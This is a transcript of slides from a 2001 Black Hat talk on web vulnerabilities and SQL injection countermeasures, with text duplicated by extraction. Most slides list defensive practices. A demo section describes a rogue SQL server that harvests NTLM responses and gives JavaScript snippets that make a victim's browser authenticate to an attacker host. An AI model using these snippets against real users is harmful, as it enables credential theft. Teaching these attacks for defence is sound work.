welcome to blackhat! blackhat security briefings amsterdam 2001 timothy m. mullen anchoris.com, inc....

20
Welcome to Blackhat! Welcome to Blackhat! Blackhat Security Blackhat Security Briefings Briefings Amsterdam 2001 Amsterdam 2001 Timothy M. Mullen Timothy M. Mullen AnchorIS.Com, Inc. AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Upload: luke-armstrong

Post on 27-Dec-2015

223 views

Category:

Documents


9 download

TRANSCRIPT

Page 1: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Welcome to Blackhat!Welcome to Blackhat!

Blackhat Security BriefingsBlackhat Security Briefings

Amsterdam 2001Amsterdam 2001

Timothy M. MullenTimothy M. MullenAnchorIS.Com, Inc.AnchorIS.Com, Inc.

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 2: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection Countermeasures Countermeasures Securing your servers from the most Securing your servers from the most

insidiousinsidiousof attacks:of attacks:

The demands of the Global Marketplace have made web The demands of the Global Marketplace have made web development more complex than ever. With customer development more complex than ever. With customer demands and competitive influences, the functions our demands and competitive influences, the functions our applications must be capable of performing constantly applications must be capable of performing constantly push our development into new areas. push our development into new areas.

Even with enterprise firewall solutions, hardened servers, Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and and up-to-date web server software in place and properly configured, poor design methodology can leave properly configured, poor design methodology can leave

our systems open for attack.our systems open for attack. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 3: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Session OverviewSession Overview

Part I:Part I:∙ ∙ VulnerabilitiesVulnerabilities

Client-side HTML, URL Manipulation, SQL InjectionClient-side HTML, URL Manipulation, SQL Injection∙ ∙ CountermeasuresCountermeasures

Input Validation, Data Sanitation, Variable Typing, Input Validation, Data Sanitation, Variable Typing, Procedure Structure, Permissions and ACL’s.Procedure Structure, Permissions and ACL’s.

Part II:Part II:∙ ∙ Live Demos highlighting real-word sites with different Live Demos highlighting real-word sites with different

issues, participant involvement and brainstormingissues, participant involvement and brainstorming∙ ∙ SQueaL DemoSQueaL Demo (SQueaL is a NTLM logging rouge SQL (SQueaL is a NTLM logging rouge SQL

server app)server app)

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 4: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Part IPart I

VulnerabilitesVulnerabilites∙ ∙ Client-side HTMLClient-side HTML

∙ ∙ URL ManipulationURL Manipulation∙ ∙ SQL InjectionSQL Injection

CountermeasuresCountermeasures∙ ∙ Implementation/SetupImplementation/Setup ∙ Input Validation∙ Input Validation∙ ∙ Data SanitationData Sanitation ∙ Variable Typing∙ Variable Typing∙ ∙ Procedure StructureProcedure Structure ∙ Permissions and ACL’s∙ Permissions and ACL’s

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 5: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Vulnerabilities – Vulnerabilities – Lab DemosLab Demos

Client-side HTML IssuesClient-side HTML Issues∙ ∙ Web FormsWeb Forms∙ ∙ Input/Select controlsInput/Select controls∙ ∙ Hidden FieldsHidden Fields

URL ManipulationURL Manipulation∙ ∙ Editing the URLEditing the URL∙ ∙ Session variablesSession variables∙ ∙ CookiesCookies

SQL InjectionSQL Injection∙ ∙ The possibilities are endless!The possibilities are endless!

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 6: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Countermeasures-Countermeasures-Lab DemosLab Demos

Implementation and SetupImplementation and Setup∙ ∙ ADODB Connection Strings and DSN’sADODB Connection Strings and DSN’s

∙ ∙ ODBC Error reportingODBC Error reporting

∙ ∙ Custom error pagesCustom error pages

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 7: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Countermeasures-Countermeasures-Lab DemosLab Demos

Input ValidationInput Validation∙ ∙ Querystring count checkingQuerystring count checking

∙ ∙ Data Type ValidationData Type Validation

∙ ∙ Value/Length CheckingValue/Length Checking

∙ ∙ Extents/Boundary Checking Extents/Boundary Checking

∙ ∙ Host submission limits per unit of timeHost submission limits per unit of time

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 8: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Countermeasures-Countermeasures-Lab DemosLab Demos

Data SanitationData Sanitation∙ ∙ REPLACE functionREPLACE function

∙ ∙ RegExp function RegExp function

∙ ∙ Custom functions / explicit declarationsCustom functions / explicit declarations

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 9: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Countermeasures-Countermeasures-Lab DemosLab Demos

Variable TypingVariable Typing∙ ∙ Command objectCommand object

∙ ∙ Parameter declarationParameter declaration

∙ ∙ Command type declaration Command type declaration

∙ ∙ Execute as methodsExecute as methods

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 10: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Countermeasures-Countermeasures-Lab DemosLab Demos

SQL Stored Procedure StructureSQL Stored Procedure Structure∙ ∙ Use stored procedures whenever possibleUse stored procedures whenever possible

∙ ∙ Type cast variables Type cast variables

∙ ∙ Create and use Views as table sourcesCreate and use Views as table sources

∙ ∙ Avoid “Select *” statements for performance as well Avoid “Select *” statements for performance as well as securityas security

∙ ∙ sp_executeSQL procedure for ad hoc queriessp_executeSQL procedure for ad hoc queries

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 11: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Countermeasures-Countermeasures-Lab DemosLab Demos

Permissions and ACL’s.Permissions and ACL’s.∙ ∙ Open views, but lock down tablesOpen views, but lock down tables

∙ ∙ Use groupsUse groups

∙ ∙ lock down xp_cmdshell, xp_sendmail or removelock down xp_cmdshell, xp_sendmail or remove

∙ ∙ SQL Service contextSQL Service context

∙ ∙ Integrated/Mixed securityIntegrated/Mixed security

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 12: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection Countermeasures Countermeasures Part I ConcludedPart I Concluded

15 Minute Break15 Minute Break

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 13: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection CountermeasuresCountermeasuresWelcome Back!Welcome Back!

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 14: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Part IIPart II

Live Web Demos and FeedbackLive Web Demos and Feedback∙ ∙ Expose potentially insecure implementations of web Expose potentially insecure implementations of web applicationsapplications

∙ ∙ Discuss potential vulnerabilities and exploitsDiscuss potential vulnerabilities and exploits

∙ ∙ Mitigation and PreventionMitigation and Prevention

SQUeaL Demo: Grabbing NTLM SQUeaL Demo: Grabbing NTLM responses from unsuspecting responses from unsuspecting usersusers

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 15: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerabilities-Web Vulnerabilities-Live DemosLive Demos

Real-world web application issues Real-world web application issues and feedbackand feedback

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 16: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerabilities-Web Vulnerabilities-Live DemosLive Demos

SQUealL: NTLM logging rouge SQL SQUealL: NTLM logging rouge SQL ServerServer∙ ∙ Linux server application based on DilDog’s Linux server application based on DilDog’s “TalkNTLM” code“TalkNTLM” code

∙ ∙ Waits for TCP/IP connection on 1433, and attempts Waits for TCP/IP connection on 1433, and attempts to authenticate via NTLMto authenticate via NTLM

∙ ∙ Logs domain, username, and NTLM response Logs domain, username, and NTLM response

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 17: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerabilities-Web Vulnerabilities-Live DemosLive Demos

SQUeaL: Getting them to connectSQUeaL: Getting them to connect∙ ∙ ADODB Connection (Lame)ADODB Connection (Lame)conn=new ActiveXObject("ADODB.Connection");conn=new ActiveXObject("ADODB.Connection");

conn.ConnectionString='Provider=SQLOLEDB.1;Integrconn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial ated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';Library=dbnetlib';

conn.Open();conn.Open();

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 18: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerably and SQL Web Vulnerably and SQL Injection Injection Countermeasures Countermeasures SQUeaL: Getting them to connectSQUeaL: Getting them to connect

∙ ∙ DBNETLIB (Not so lame)DBNETLIB (Not so lame)

{ns = new {ns = new ActiveXObject("SQLNS.SQLNamespace");ActiveXObject("SQLNS.SQLNamespace");

ns.Initialize ("Grabber", 2, ns.Initialize ("Grabber", 2,

"Server=10.1.1.1;"Server=10.1.1.1;

Trusted_Connection=Yes;Trusted_Connection=Yes;

Network Library=dbnetlib.dll");Network Library=dbnetlib.dll"); }}

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 19: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

Web Vulnerability and Web Vulnerability and SQL Injection SQL Injection CountermeasuresCountermeasuresClosing RemarksClosing Remarks

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 20: Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001 Timothy M. Mullen AnchorIS.Com, Inc. Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com;

THANK YOU!THANK YOU!

Additional Resources:Additional Resources:http://www.hammerofgod.comhttp://www.hammerofgod.comemailto:[email protected]:[email protected]

http://www.securityfocus.comhttp://www.securityfocus.com http://www.sqlsecurity.comhttp://www.sqlsecurity.com http://heap.nologin.net/aspsec.htmlhttp://heap.nologin.net/aspsec.html http://security.devx.com/bestdefense/http://security.devx.com/bestdefense/

default.aspdefault.asp http://www.microsoft.com/technet/treeview/http://www.microsoft.com/technet/treeview/

default.asp?url=/technet/itsolutions/default.asp?url=/technet/itsolutions/security/database/database.aspsecurity/database/database.asp

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]